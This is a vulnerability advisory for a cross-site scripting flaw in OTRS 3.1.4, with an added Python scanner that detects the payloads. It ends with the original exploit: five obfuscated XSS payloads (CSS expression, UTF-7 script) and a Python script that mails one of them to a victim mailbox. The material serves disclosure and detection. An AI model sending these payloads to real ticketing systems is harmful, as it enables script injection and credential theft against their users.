vendor: OTRS Open Technology Real Services
by: loneferret of Offensive Security
CVSS: 7,5 HIGH
CWE: 79 Cross-Site Scripting (XSS)
Product Name: OTRS Open Technology Real Services
Affected Version From: 3.1.4
Affected Version To: 3.1.4
Patch Exists: YES
Related CVE: CVE-2012-3286
CPE: a:otrs:otrs
Platforms Tested: Windows
2012

OTRS Open Technology Real Services XSS Vulnerability

A Cross-Site Scripting (XSS) vulnerability was discovered in OTRS Open Technology Real Services version 3.1.4. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'Body' parameter. A remote attacker can send a specially crafted request containing malicious HTML and script code to the vulnerable application and execute arbitrary code in the browser of the victim in the context of the vulnerable site. Successful exploitation of this vulnerability may allow an attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Update to the latest version of OTRS Open Technology Real Services.
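
Until the update is applied, inbound HTML mail can be screened for the payload classes listed in the exploit header on this page. The following is an added example, not part of the original advisory or of OTRS: it flags `expression(` in `style` attributes after undoing entity, comment and backslash obfuscation, and flags UTF-7 charset declarations in `META` tags. The names `scan_body`, `normalize_css` and the finding labels are hypothetical.

```python
import re
from html.parser import HTMLParser

# One left-to-right pass over a style value: CSS comments and quoted strings,
# whichever starts first, so "/*" inside a string does not open a comment.
_CSS_NOISE = re.compile(r"/\*.*?\*/|\"[^\"]*\"|'[^']*'", re.S)
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})\s?|\\(.)", re.S)
_EXPRESSION = re.compile(r"expression\s*\(", re.I)
_UTF7 = re.compile(r"utf-?7", re.I)


def _unescape(match):
    """Decode a CSS hex escape, or drop the backslash from a plain one."""
    if match.group(1) is None:
        return match.group(2)
    return chr(min(int(match.group(1), 16), 0x10FFFF))


def normalize_css(value):
    """Strip comments and strings, then resolve backslash escapes."""
    return _CSS_ESCAPE.sub(_unescape, _CSS_NOISE.sub("", value))


class BodyScanner(HTMLParser):
    """Records risky constructs; attribute entities are decoded by HTMLParser."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = set()

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            value = value or ""
            if name == "style" and _EXPRESSION.search(normalize_css(value)):
                self.findings.add("css-expression")
            if tag == "meta" and name in ("content", "charset") and _UTF7.search(value):
                self.findings.add("utf7-charset")


def scan_body(html_body):
    """Return the sorted finding labels for one HTML message body."""
    scanner = BodyScanner()
    scanner.feed(html_body)
    scanner.close()
    return sorted(scanner.findings)


if __name__ == "__main__":
    # Payload 3 from the list on this page, used as a detection fixture.
    print(scan_body("""<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">"""))
```

This is a detection aid for a mail gateway or ticket-import hook, not a replacement for output sanitization in the application itself.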

Exploit-DB raw data:

#!/usr/bin/python

'''

Author: loneferret of Offensive Security
Product: OTRS Open Technology Real Services
Version: 3.1.4 (Windows)
Vendor Site: http://www.otrs.com/en/

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response other than auto-reply from vendor
08 Aug 2012: Public Disclosure
22 Aug 2012: Update from CERT: vulnerability patched
     http://www.kb.cert.org/vuls/id/582879
     http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2012-01/

Installed On: Windows Server 2003 SP2
Client Test OS: Windows 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9

Injection Point: Body
Injection Payload(s):
1: <DIV STYLE="width: expression(alert('XSS'));">
2: exp/*<XSS STYLE='no\xss:noxss("*//*");
xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
3: <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
4: <XSS STYLE="xss:expression(alert('XSS'))">
5: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

'''

import smtplib, urllib2
 
payload = """<DIV STYLE="width: expression(alert('XSS'));">"""
 
def sendMail(dstemail, frmemail, smtpsrv, username, password):
        msg  = "From: hacker@offsec.local\n"
        msg += "To: victim@victim.local\n"
        msg += 'Date: Today\r\n'
        msg += "Subject: Offensive Security\n"
        msg += "Content-type: text/html\n\n"
        msg += "XSS" + payload + "\r\n\r\n"
        server = smtplib.SMTP(smtpsrv)
        server.login(username,password)
        try:
                server.sendmail(frmemail, dstemail, msg)
        except Exception, e:
                print "[-] Failed to send email:"
                print "[*] " + str(e)
        server.quit()
 
username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv  = "172.16.84.171"
 
print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)